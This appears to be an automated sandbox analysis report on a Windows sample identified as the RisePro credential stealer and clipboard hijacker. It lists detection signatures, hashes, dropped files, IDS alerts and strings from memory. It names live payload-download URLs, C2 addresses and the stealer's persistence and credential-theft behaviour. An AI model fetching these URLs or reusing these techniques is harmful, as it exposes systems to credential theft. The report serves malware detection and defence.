Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1431690
MD5: 565aa174e2e5cbae5811f5ed0f1d5e70
SHA1: 4ae3d13959acd0d263f115c9ebab24ffef4aec9e
SHA256: 96b0bc34b0b56a08f072fa86b980bc99ed38403dfd37e0c2c87e691c5c87ac9b
Tags: exe

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to inject threads in other processes
Creates multiple autostart registry keys
Found stalling execution ending in API Sleep call
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: https://easy2buy.ae/wp-content/upgrade/k.exe$ Avira URL Cloud: Label: malware
Source: https://easy2buy.ae/wp-content/upgrade/k.exe Avira URL Cloud: Label: malware
Source: http://193.233.132.175/server/k/l2.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: https://easy2buy.ae:80/wp-content/upgrade/k.exe Virustotal: Detection: 5% Perma Link
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80% Perma Link
Source: file.exe ReversingLabs: Detection: 28%
Source: file.exe Virustotal: Detection: 22% Perma Link
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00983EB0 CryptUnprotectData, 0_2_00983EB0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009833B0 CreateDirectoryA,FindFirstFileA, 0_2_009833B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009A3880 FindFirstFileA,GetLastError,CreateDirectoryA, 0_2_009A3880
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F1F8C FindFirstFileExW,GetLastError, 0_2_008F1F8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008F1FAC FindFirstFileExW, 0_2_008F1FAC

Networking

Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49709 -> 193.233.132.175:80
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 193.233.132.47:50500 -> 192.168.2.5:49706
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49722
Source: global traffic TCP traffic: 192.168.2.5:49706 -> 193.233.132.47:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Thu, 25 Apr 2024 14:29:10 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 19 Apr 2024 15:26:27 GMTConnection: keep-aliveETag: "66228d23-45a2b8"Accept-Ranges: bytes
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 193.233.132.47 193.233.132.47
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/185.152.66.230 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=185.152.66.230 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984EB0 recv,setsockopt,recv,recv,recv,recv,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep, 0_2_00984EB0
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: global traffic DNS traffic detected: DNS query: easy2buy.ae
Source: file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4444719572.0000000001475000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304691476.0000000001474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=185.152.66.230
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304591521.000000000147C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444742082.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=185.152.66.230VEY
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=185.152.66.230P
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/
Source: file.exe, 00000000.00000002.4445612966.0000000006115000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe$
Source: file.exe, 00000000.00000003.2283281296.0000000006114000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304638888.0000000006115000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445612966.0000000006115000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4444174900.00000000013E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001418000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3304691476.0000000001474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000002.4444174900.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/185.152.66.230
Source: file.exe, 00000000.00000002.4444174900.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/185.152.66.230B
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr, MSIUpdaterV2.exe0.0.dr, JcZ7W4aCxlpc4pOVLwL1.exe.0.dr, AdobeUpdaterV2.exe0.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, UhOL8vG3NSxPpn1EjM9IIxV.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot7
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2069275480.00000000064F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060488371.00000000064EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063654838.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, KxyubmlbrMrsWeb Data.0.dr, _oONYmGn6yA2Web Data.0.dr, Hm8O0mwXDHDOWeb Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445827728.00000000064D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2066452942.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445435690.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059284547.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074030105.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075187683.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072444515.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058242529.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2063872540.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072869955.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059623324.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071206391.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069515313.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064694452.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071762916.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2060555668.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2067854722.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062612473.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
